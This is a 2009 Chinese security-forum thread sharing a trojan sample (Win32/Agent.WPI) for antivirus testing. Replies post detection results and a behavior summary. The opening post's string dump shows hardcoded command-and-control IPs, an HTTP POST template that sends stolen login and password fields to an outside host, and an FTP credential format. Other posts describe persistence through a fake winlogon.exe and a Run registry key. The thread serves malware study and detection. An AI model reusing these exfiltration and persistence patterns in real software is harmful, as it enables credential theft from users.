收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 天天更新的Win32/Agent.WPI
12下一页
返回列表 发新帖
查看: 3109|回复: 12
收起左侧

[病毒样本] 天天更新的Win32/Agent.WPI

[复制链接]
The EQs
发表于 2009-3-24 15:17:39 | 显示全部楼层 |阅读模式
我每天都在人工捕捉,汗一个

> Ultra String Reference
> Address    Disassembly                               Text String
> 004010B7   push    004070B0                          91.203.93.23
> 004010CB   push    004070A4                          70.87.136.291.203.93.23
> 004010FC   push    00407090                          dm=%s&lg=%s&ps=%s\n\n70.87.136.291.203.93.23
> 00401122   push    00407030                          post /cgi-bin/check.pl http/1.1\n\nhost: addded.com\n\ncontent-length: %d\n\nconnection: close\n\n\n\n%s
> 00401182   push    0040713C                          software
> 004011A7   push    00407130                          microsoft
> 004011C0   push    00407128                          windowsmicrosoft
> 004011D5   push    00407118                          currentversion
> 004011EA   push    0040710C                          explorer
> 004011FF   push    004070FC                          shell folders
> 0040121D   push    004070F4                          appdatashell folders
> 00401235   push    004070DC                          %s\microsoft\windows\
> 0040124C   mov     edi, 004070C0                     c:\program files\microsoft\%s\microsoft\windows\
> 00401290   push    0040713C                          software
> 004012AD   push    00407130                          microsoft
> 004012C6   push    00407128                          windowsmicrosoft
> 004012DB   push    00407118                          currentversion
> 004012F0   push    00407178                          run%s%s
> 00401354   push    00407148                          software\microsoft\windows\currentversion\run
> 0040142B   push    0040717C                          %s%s
> 004014D8   push    00407214                          %swinlogon.exe
> 004014FF   push    00407204                          winlogon.exe
> 0040151D   push    004071E4                          microsoft windows logon processwinlogon.exe
> 004015C8   push    004071D8                          bind error\nmicrosoft windows logon processwinlogon.exe
> 004015F8   push    004071C4                          ioctlsocket error\n
> 00401656   push    004071A8                          ftp: %s\nuser: %s\npass: %s\n\nioctlsocket error\n
> 00401772   push    004071A0                          %s
> 004017B3   push    00407194                          %d.%d.%d.%d%s
> 0040185A   push    004071A0                          %s
> 0040189C   push    00407194                          %d.%d.%d.%d%s
> 00401E68   mov     ebp, esp                          (initial cpu selection)
> 004028D3   push    004061B0                          conin$

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

ledled
发表于 2009-3-24 15:21:31 | 显示全部楼层
Name: Trojan.FakeAlert.Gen!Pac.4
Type: Virus

Description:


Files:
c:\users\administrator\desktop\file(2)\file(2).exe
回复

举报

will
发表于 2009-3-24 15:41:18 | 显示全部楼层
MD5 HASH:     F0F53B5FE48A896D25EEF3E654172474
Behavior:     1.复制自身到%APPDATA%\Microsoft\Windows\winlogon.exe
              2.创建注册表自启动项,注册表修改如下:
                  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
                    "Microsoft Windows logon process"="C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\winlogon.exe"
              3.启动Winlogon.exe(fake),该进程访问DNS/RPC服务器
Discription:     超时,进程被终止.
                       危险系数: 7.2
                       可能是未知后门.
回复

举报

幸福的猪猪
发表于 2009-3-24 16:49:59 | 显示全部楼层

回复 1楼 EQ2 的帖子

to kaba kill !
回复

举报

wrq
发表于 2009-3-24 18:53:46 | 显示全部楼层
Category:
Trojan Monitoring Software

Description:
This program is dangerous and records user activity.

Advice:
Remove this software immediately.

Resources:
containerfile:
C:\Users\wrq\Desktop\file(2).zip

file:
C:\Users\wrq\Desktop\file(2).zip->file(2)/file(2).exe->(UPX)

filelocalcopy:
C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{E53F5B40-9FFD-456F-ACCF-770AAA61007D}-file(2).zip

webfile:
C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{E53F5B40-9FFD-456F-ACCF-770AAA61007D}-file(2).zip|http://bbs.kafan.cn/attachment.p ... c2&t=1237891934

webfile:
C:\Users\wrq\Desktop\file(2).zip|http://bbs.kafan.cn/attachment.p ... c2&t=1237891934
回复

举报

江湖的fans
发表于 2009-3-24 18:56:53 | 显示全部楼层
TO  RISING
回复

举报

黑衣~魂
发表于 2009-3-24 20:20:58 | 显示全部楼层
TO DW
回复

举报

Mars★J
发表于 2009-3-24 20:30:54 | 显示全部楼层
IOSN-查杀
2009年3月24日 20时26分09秒开始
于2009年3月24日 20时26分23秒结束
安全度:危险
获取可疑进程WINLOGON.EXE 试图探入系统 已阻止
判断:
     可能是WIN特洛伊木马变种程序,已经成功清除。
执行:
为保障您的系统安全,执行进一步安全措施。
回复

举报

BING126
头像被屏蔽
发表于 2009-3-24 20:55:12 | 显示全部楼层
McAfee miss
回复

举报

kingmuro
头像被屏蔽
发表于 2009-3-25 00:35:45 | 显示全部楼层
过pctools
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-11-7 02:33 , Processed in 0.138691 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表